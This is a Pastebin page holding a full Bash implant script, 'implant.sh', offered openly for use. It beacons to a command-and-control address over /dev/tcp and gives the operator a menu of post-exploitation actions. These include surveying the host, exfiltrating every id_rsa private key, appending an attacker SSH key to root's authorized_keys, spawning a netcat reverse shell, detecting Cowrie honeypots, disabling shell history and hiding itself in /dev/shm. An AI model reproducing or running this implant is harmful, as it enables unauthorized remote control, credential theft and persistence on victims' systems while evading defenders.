Advertisement
FlyFar

implant.sh

Jul 10th, 2023
784
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 9.06 KB | Cybersecurity | 0 0
  1. #!/bin/bash
  2. red='\e[31m'
  3. lred='\e[91m'
  4. green='\e[32m'
  5. lgreen='\e[92m'
  6. yellow='\e[33m'
  7. lyellow='\e[93m'
  8. blue='\e[34m'
  9. lblue='\e[94m'
  10. magenta='\e[35m'
  11. lmagenta='\e[95m'
  12. cyan='\e[36m'
  13. lcyan='\e[96m'
  14. grey='\e[90m'
  15. lgrey='\e[37m'
  16. white='\e[97m'
  17. black='\e[30m'
  18. ##)
  19. #( bg
  20. b_red='\e[41m'
  21. b_lred='\e[101m'
  22. b_green='\e[42m'
  23. b_lgreen='\e[102m'
  24. b_yellow='\e[43m'
  25. b_lyellow='\e[103m'
  26. b_blue='\e[44m'
  27. b_lblue='\e[104m'
  28. b_magenta='\e[45m'
  29. b_lmagenta='\e[105m'
  30. b_cyan='\e[46m'
  31. b_lcyan='\e[106m'
  32. b_grey='\e[100m'
  33. b_lgrey='\e[47m'
  34. b_white='\e[107m'
  35. b_black='\e[40m'
  36. ##)
  37. #( special
  38. reset='\e[0;0m'
  39. bold='\e[01m'
  40. italic='\e[03m'
  41. underline='\e[04m'
  42. inverse='\e[07m'
  43. conceil='\e[08m'
  44. crossedout='\e[09m'
  45. bold_off='\e[22m'
  46. italic_off='\e[23m'
  47. underline_off='\e[24m'
  48. inverse_off='\e[27m'
  49. conceil_off='\e[28m'
  50. crossedout_off='\e[29m'
  51. unset HISTFILE
  52.  
  53. ready () {
  54.   eval 'printf "${lgreen}Ready:\r\nEnter help to see menu:${reset} \r\n" >&3;'
  55. }
  56.  
  57.  
  58. while [ true ]; do
  59.  
  60.     arr[0]="C2_IP_ADDRESS_HERE"
  61.         svr=${arr[0]}
  62.  
  63.         eval 'exec 3<>/dev/tcp/$svr/9001;'
  64.         if [[ ! "$?" -eq 0 ]] ; then
  65.             continue
  66.         fi
  67.  
  68.     eval 'printf "${red}$(date)${reset}\r\n" >&3;'
  69.  
  70.     if [[ ! "$?" -eq 0 ]] ; then
  71.             continue
  72.         fi
  73.         eval 'printf "${bold}Agent Name:${bold_off} $(md5sum /etc/passwd | cut -d '/' -f1)\r\n" >&3;'
  74.     eval 'ready >&3;'
  75.         if [[ ! "$?" -eq 0 ]] ; then
  76.             continue
  77.         fi
  78.  
  79.         while [ true ]; do
  80.             eval "read msg_in <&3;"
  81.  
  82.                 if [[ ! "$?" -eq 0 ]] ; then
  83.                     break
  84.                 fi
  85.  
  86.                 if  [[ "$msg_in" =~ "ping" ]] ; then
  87.                     eval 'printf "${green}succ %s${reset}\r\n" "${msg_in:5}" >&3;'
  88.                         if [[ ! "$?" -eq 0 ]] ; then
  89.                             break
  90.                         fi
  91.                         sleep 1
  92.                         eval 'printf "${green}joined${reset}\r\n\r\n" >&3;'
  93.             eval 'ready >&3;'
  94.  
  95.                         if [[ ! "$?" -eq 0 ]] ; then
  96.                                 break
  97.                         fi
  98.             elif [[ "$msg_in" =~ "help" ]] ; then
  99.             eval 'printf "${bold}Help Menu:${bold_off}\r\n${bold}ping${bold_off} [*] check connection\r\n${bold}date${bold_off} [*] print UTC date time + local device time\r\n${bold}survey${bold_off} [*] conduct host survey\r\n${bold}cronj${bold_off} [*] investigate cron jobs\r\n${bold}rsyslog${bold_off} [*] check for remote logging\r\n${bold}cgroup${bold_off} [*] see cgroups\r\n${bold}sshkey${bold_off} [*] store ssh pub key in /root/.ssh/\r\n${bold}ld${bold_off} [*] dir listing\r\n${bold}honeypot${bold_off} [*] check for cowrie honeypot\r\n${bold}help${bold_off} [*] display commands\r\n${bold}ps${bold_off} [*] process list tree\r\n${bold}netstat${bold_off} [*] view connections\r\n${bold}users${bold_off} [*] see logged on users\r\n${bold}shell${bold_off} [*] spawn remote shell\r\n${bold}traceroute${bold_off} [*] see path to remote machine\r\n${bold}exit${bold_off} [*] quit session\r\n\r\n" >&3;'
  100.             eval 'ready >&3;'
  101.  
  102.         elif [[ "$msg_in" =~ "traceroute" ]] ; then
  103.             eval 'printf "traceroute 8.8.8.8: $(traceroute 8.8.8.8 > /tmp/trace)\r\n" >&3;'
  104.             sleep 3
  105.             eval 'printf "getting data: $(cat /tmp/trace)\r\n" >&3;'
  106.             rm /tmp/trace
  107.             eval 'ready >&3;'
  108.  
  109.         elif [[ "$msg_in" =~ "shell" ]]; then
  110.             eval 'printf "Start a listener on 9002:\r\n" >&3;'
  111.             sleep 10
  112.             eval '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 9002 >/tmp/f)'
  113.             eval 'ready >&3;'
  114.        
  115.         elif [[ "$msg_in" =~ "date" ]]; then
  116.             eval 'printf "${bold}Date/Time (local + utc):${bold_off}\r\n$(date; date -u)\r\n" >&3;'
  117.  
  118.         elif [[ "$msg_in" =~ "cronj" ]]; then
  119.             eval 'printf "${bold}${green}cron tasks writable by user:${reset}\r\n$(find -L /etc/cron* /etc/anacron /var/spool/cron -writable 2>/dev/null)\r\n" >&3;'
  120.             eval 'printf "${bold}${green}cron jobs:${reset}\r\n$(grep -ERv "^(#|$)" /etc/crontab /etc/cron.d/ /etc/anacrontab 2>/dev/null)\r\n" >&3;'
  121.             eval 'printf "${bold}${green}can we read user crontabs:${reset}\r\n$(ls -la /var/spool/cron/crontabs/* 2>/dev/null || echo "permission denied")\r\n\n" >&3;'
  122.  
  123.         elif [[ "$msg_in" =~ "rsyslog" ]]; then
  124.             eval 'printf "${bold}${green}checking rsyslog:${reset}\r\n$(cat /etc/rsyslog.conf | grep -v "^#" || echo "permission denied")\r\n" >&3;'
  125.  
  126.         elif [[ "$msg_in" =~ "ld" ]]; then
  127.            eval 'printf "Dir: $(pwd)\r\n" >&3;'
  128.            eval 'printf "Listing: $(ls -lartF)\r\n" >&3;'
  129.            eval 'ready >&3;'
  130.  
  131.    
  132.         elif [[ "$msg_in" =~ "users" ]]; then
  133.             eval 'printf "Logged on users: $(w)\r\n" >&3;'
  134.             eval 'ready >&3;'
  135.  
  136.         elif [[ "$msg_in" =~ "honeypot" ]]; then
  137.             eval 'printf "${green}Starting honeypot checks:${reset}\r\n" >&3;'
  138.             view=$(which cat)
  139.  
  140.             if [ "$($view /etc/hostname | grep srv04)" ]; then
  141.                 eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
  142.                     exit 4
  143.             else
  144.                     eval 'printf "Hostname is NOT srv04\r\n" >&3;'
  145.             fi
  146.             look=$(which ls)
  147.             if [ "$($look /home | grep 'phil' && $view /proc/version | grep "Debian 4.")" ]; then
  148.                 eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
  149.                     exit 5
  150.             else
  151.                     eval 'printf "No phil user detected\r\n" >&3;'
  152.             fi
  153.             if [ "$(which file)" ]; then
  154.                     eval 'printf "file command on the box\r\n" >&3;'
  155.             else      
  156.                 eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
  157.                     exit 6
  158.             fi
  159.             fake=$(ping -c 4 999.999.999.999 | grep "64 bytes" | cut -d " " -f1,2)
  160.             if [ "$fake" ];then
  161.                 eval 'printf "${red}Honeypot detected!!!${reset}\r\n" >&3;'
  162.                     exit 7
  163.             else
  164.                     eval 'printf "Fake internet not detected\r\n" >&3;'
  165.                 eval 'printf "${green}Honey pot checks over, no cowrie hp detected${reset}\n\r" >&3;'
  166.                 eval 'ready >&3;'
  167.             fi
  168.         elif [[ "$msg_in" =~ "ps" ]]; then
  169.             eval 'printf "Process list: $(ps -ef 2>/dev/null)\r\n" >&3;'
  170.             eval 'ready >&3;'
  171.  
  172.         elif [[ "$msg_in" =~ "netstat" ]]; then
  173.             eval 'printf "Connections: $(netstat -antpu 2>/dev/null || ss -tulwn 2>/dev/null)\r\n" >&3;'
  174.             eval 'ready >&3;'
  175.  
  176.         elif [[ "$msg_in" =~ "cgroup" ]]; then
  177.             eval 'printf "cgroup: $(systemd-cgls --no-pager 2>/dev/null)\r\n" >&3;'
  178.             eval 'ready >&3;'
  179.  
  180.         elif [[ "$msg_in" =~ "sshkey" ]]; then
  181.             perms=$(id | grep uid | cut -d ' ' -f1 | cut -d '=' -f2 | cut -d '(' -f1)
  182.             if [ $perms -eq 0 ]; then
  183.                 mkdir -p /root/.ssh 2>/dev/null
  184.                 echo "SSH_KEY_HERE"  >> /root/.ssh/authorized_keys
  185.                 eval 'printf "Sending authorized_keys file back: $(cat /root/.ssh/authorized_keys)\r\n" >&3;'
  186.                 eval 'ready >&3;'
  187.             else
  188.                 eval 'printf "You are not root!! SSH Key not added\r\n" >&3;'
  189.                 eval 'ready >&3;'
  190.             fi
  191.         elif [[ "$msg_in" =~ "survey" ]]; then
  192.             eval 'printf "${bold}${green}public ip information:${reset}\n$(curl ipinfo.io 2>/dev/null; sleep 1)\r\n\n" >&3;'
  193.             eval 'printf "${bold}${green}ip information:\n${reset}$(ip a | ifconfig)\r\n\n" >&3;'
  194.             eval 'printf "${bold}${green}perms:\n${reset}$(id)\r\n\n" >&3;'
  195.             eval 'printf "${bold}${green}suid binaries:\n${reset}$(find / -perm -u=s -type f 2>/dev/null)\r\n\n" >&3;'
  196.  
  197.             eval 'printf "${bold}${green}os, kernel:\n${reset}$(uname -a)\r\n\n" >&3;'
  198.             eval 'printf "${bold}${green}crontab:\r\n${reset}$(crontab -l | grep -Ev "^#")\r\n\n" >&3;'
  199.             eval 'printf "${bold}${green}ssh keys:\n${reset}$(find / -type f -name "id_rsa" 2>/dev/null -exec cat {} \;)\r\n\n" >&3;'
  200.             eval 'printf "${bold}${green}connections:\n${reset}$(netstat -antpu 2>/dev/null || ss -tulwn 2>/dev/null)\r\n" >&3;'
  201.             eval 'printf "${bold}${green}process list:\n${reset}$(ps -ef 2>/dev/null)\r\n" >&3;'
  202.             eval 'ready >&3;'
  203.  
  204.         elif [[ "$msg_in" =~ "exit" ]]; then
  205.             eval 'printf "${bold}${red}implant exiting, goodbye${reset}\r\n" >&3;'
  206.             exit 0
  207.         elif [[ "$msg_in" =~ "hide" ]]; then
  208.             eval 'printf "${bold}implant hiding, will call back shortly on the same port${reset}\r\n" >&3;'
  209.             mv implant.sh /dev/shm
  210.             sleep 5
  211.             source /dev/shm/implant.sh || bash /dev/shm/implant.sh
  212.             sleep 5
  213.             rm /dev/shm/implant.sh
  214.            
  215.             exit 0
  216.              
  217.         else
  218.             eval 'printf "${red}That is not a valid command:${reset}\r\n" >&3;'      
  219.                 fi
  220.         done
  221. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement